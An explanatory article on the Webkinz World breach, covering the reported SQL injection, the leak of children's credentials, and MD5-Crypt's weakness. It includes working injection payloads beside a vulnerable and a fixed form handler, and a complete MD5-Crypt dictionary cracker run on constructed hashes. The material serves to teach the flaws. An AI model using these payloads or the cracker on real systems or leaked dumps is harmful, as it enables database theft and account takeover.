How was Webkinz Hacked?
Webkinz World is an online game launched in 2005 by the Canadian toy company Ganz. It complements Ganz's line of plush toys: each toy comes with a code that, when entered on the Webkinz website, creates a virtual pet that children can then play with and look after. The game is very popular with children and is reportedly one of the most successful online children's games of the past decade. According to ZDNet, the vulnerability had been discovered months before the leak, and details of it had been circulating on hacking forums and in online IM chat groups for that whole time. The flaw was in one of the Webkinz website's web forms: ZDNet reports that the hacker “allegedly gained access to the games database using an SQL injection vulnerability present in one of the website’s web forms.”
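The kind of bug ZDNet describes, shown as an added example rather than anything from the Webkinz site: a web-form value pasted straight into a SQL query, beside the parameterised version of the same lookup. The table, rows, hash strings and the two payloads are constructed for the demo (SQLite in memory); the real form, query and schema are not public.

```python
import sqlite3

# Added example (not Webkinz's or Ganz's code): a form handler that builds SQL
# by string concatenation, next to the bound-parameter fix. The users table and
# its contents are constructed for the demo.


def make_db() -> sqlite3.Connection:
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
        CREATE TABLE users (username TEXT, pw_hash TEXT, parent_email_hash TEXT);
        INSERT INTO users VALUES ('panda_lover', '$1$Kz7pQ2aL$hashA', 'emailhashA');
        INSERT INTO users VALUES ('kinzfan07',   '$1$e1f2g3h4$hashB', 'emailhashB');
        INSERT INTO users VALUES ('sparkles',    '$1$abcdefgh$hashC', 'emailhashC');
    """)
    return conn


def find_user_vulnerable(conn, username: str):
    """What an injectable form handler looks like: the value is pasted into SQL."""
    sql = f"SELECT username, pw_hash FROM users WHERE username = '{username}'"
    return conn.execute(sql).fetchall()


def find_user_safe(conn, username: str):
    """Same lookup with a bound parameter: the input is treated as data, never as SQL."""
    return conn.execute(
        "SELECT username, pw_hash FROM users WHERE username = ?", (username,)
    ).fetchall()


# Two classic form payloads (constructed). The first widens the WHERE clause to
# every row; the second uses UNION to pull a column the form never returns
# (here the parents' e-mail hashes), with "--" commenting out the trailing quote.
DUMP_ALL = "x' OR '1'='1"
DUMP_EMAIL_HASHES = "x' UNION SELECT username, parent_email_hash FROM users--"


def demo():
    """Run both handlers against a normal name and both payloads."""
    conn = make_db()
    return {
        "normal": find_user_vulnerable(conn, "sparkles"),
        "vuln_dump_all": find_user_vulnerable(conn, DUMP_ALL),
        "vuln_union": find_user_vulnerable(conn, DUMP_EMAIL_HASHES),
        "safe_dump_all": find_user_safe(conn, DUMP_ALL),
        "safe_union": find_user_safe(conn, DUMP_EMAIL_HASHES),
    }


if __name__ == "__main__":
    for name, rows in demo().items():
        print(f"{name:14} {len(rows)} row(s): {rows}")
```

The vulnerable handler returns every account for the first payload and every parent e-mail hash for the second; the parameterised handler returns nothing for either, because the quote characters are simply part of the username being searched for.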
What was Leaked
The hacker leaked the usernames and passwords of nearly 23 million children's accounts for the Webkinz World game, posting the logon data on a popular hacking forum. Hashed versions of parents' email addresses were also obtained, but these were not leaked. A company spokesperson said: “A number of years ago we took extra efforts to improve our encryption techniques, so that if a day came where any data did get out, it would be protected. We are currently reviewing all of the points of entry into our data to ensure that a similar attack won’t work elsewhere.” The 1 GB file containing the logon credentials came from the game's database. Although the data was leaked over the weekend, the breach it stems from reportedly occurred earlier in the month. Webkinz have stated that they detected the breach and have since patched the point of entry used by the hacker. The children's account passwords in the database were not stored in the clear but hashed with MD5-Crypt (the crypt(3) "$1$" scheme). That is weak protection by today's standards: MD5-Crypt is a salted hash with a fixed cost of only 1,000 MD5 iterations and no way to raise it, so off-the-shelf password-cracking tools can test millions of guesses per second per GPU against each hash. The per-account salt means a precomputed MD5 lookup table cannot be applied directly, but it does nothing to slow down dictionary or brute-force attacks, and passwords chosen by children are exactly the short, guessable kind such attacks recover first.
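To make the cracking point concrete, here is an added example (not code from Webkinz, Ganz or the article) that implements MD5-Crypt in pure Python following the FreeBSD crypt(3) "$1$" algorithm and then runs a small dictionary-plus-mangling attack against a constructed three-account dump. The usernames, passwords, salts and wordlist are all made up for the demo; the per-account salt is read from the hash, which is why each record has to be attacked separately and why plain MD5 lookup tables do not help.

```python
import hashlib
import string
import time

# Added example (not Webkinz's or Ganz's code): md5crypt as specified by
# FreeBSD's crypt-md5.c, plus a toy cracker over a constructed sample dump.
ITOA64 = "./0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz"
MAGIC = b"$1$"
ROUNDS = 1000  # fixed by the md5crypt design; there is no cost parameter to raise


def _to64(value: int, count: int) -> str:
    """md5crypt's little-endian base-64 variant: `count` chars, 6 bits each."""
    return "".join(ITOA64[(value >> (6 * i)) & 0x3F] for i in range(count))


def md5crypt(password: str, salt: str) -> str:
    """Hash `password` the way crypt(3) does for a "$1$<salt>$" setting."""
    pw = password.encode()
    if salt.startswith("$1$"):            # accept a full setting/hash string as salt
        salt = salt[3:]
    salt = salt.split("$", 1)[0][:8]      # salt is at most 8 characters
    sb = salt.encode()

    alt = hashlib.md5(pw + sb + pw).digest()
    ctx = hashlib.md5(pw + MAGIC + sb)
    for remaining in range(len(pw), 0, -16):   # mix in len(pw) bytes of alt
        ctx.update(alt[:min(16, remaining)])
    i = len(pw)
    while i:                                   # the "bit-walk" over len(pw)
        ctx.update(b"\0" if i & 1 else pw[:1])
        i >>= 1
    final = ctx.digest()

    for r in range(ROUNDS):                    # 1000 dependent MD5 rounds
        c = hashlib.md5(pw if r & 1 else final)
        if r % 3:
            c.update(sb)
        if r % 7:
            c.update(pw)
        c.update(final if r & 1 else pw)
        final = c.digest()

    triples = [(0, 6, 12), (1, 7, 13), (2, 8, 14), (3, 9, 15), (4, 10, 5)]
    out = "".join(_to64((final[a] << 16) | (final[b] << 8) | final[c], 4)
                  for a, b, c in triples)
    out += _to64(final[11], 2)
    return f"$1${salt}${out}"


# Constructed sample of what a leaked "username : hash" table looks like.
# Passwords are the kind a child picks; salts are fixed so the dump is stable.
SAMPLE_DUMP = [
    ("panda_lover", md5crypt("fluffy", "Kz7pQ2aL")),
    ("kinzfan07", md5crypt("webkinz1", "e1f2g3h4")),
    ("sparkles", md5crypt("Princess", "abcdefgh")),
]
WORDLIST = ["puppy", "kitten", "webkinz", "fluffy", "princess", "soccer"]  # constructed


def candidates(wordlist):
    """Tiny mangling ruleset: word, Capitalised, then one digit appended."""
    for w in wordlist:
        yield w
        yield w.capitalize()
    for w in wordlist:
        for d in string.digits:
            yield w + d
            yield w.capitalize() + d


def crack_one(hash_str: str, wordlist):
    """Return (password, guesses_tried); password is None if nothing matched.

    The salt is public (it sits in the hash), so a precomputed plain-MD5 table
    is useless, but nothing stops us hashing each guess with that salt."""
    _, _, salt, _ = hash_str.split("$", 3)
    n = 0
    for n, guess in enumerate(candidates(wordlist), 1):
        if md5crypt(guess, salt) == hash_str:
            return guess, n
    return None, n


def crack_dump(dump, wordlist):
    """Crack every record; each account needs its own run because salts differ."""
    return {user: crack_one(h, wordlist)[0] for user, h in dump}


if __name__ == "__main__":
    t0 = time.perf_counter()
    results = crack_dump(SAMPLE_DUMP, WORDLIST)
    dt = time.perf_counter() - t0
    for user, pw in results.items():
        print(f"{user:12} -> {pw}")
    print(f"cracked in {dt:.2f}s in pure Python; GPU crackers manage millions of md5crypt guesses/s")
```

Even this unoptimised Python recovers all three constructed passwords in well under a second; a proper cracker with a real wordlist and rule set scales that to millions of accounts, which is the practical meaning of "hashed with MD5-Crypt" for a dump of children's passwords.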
Current or Archived Data
According to Webkinz, user accounts that have been inactive for more than 18 months are archived. As part of the archiving process, all information associated with the account is removed, leaving only the username and (hashed) password. This is done for security purposes, so that if an intrusion occurs no information of value is stolen. A username paired with a crackable password hash still has value to an attacker, however, since passwords are frequently reused across sites. It is still unknown whether the leaked data belongs to these archived accounts or to current, active accounts.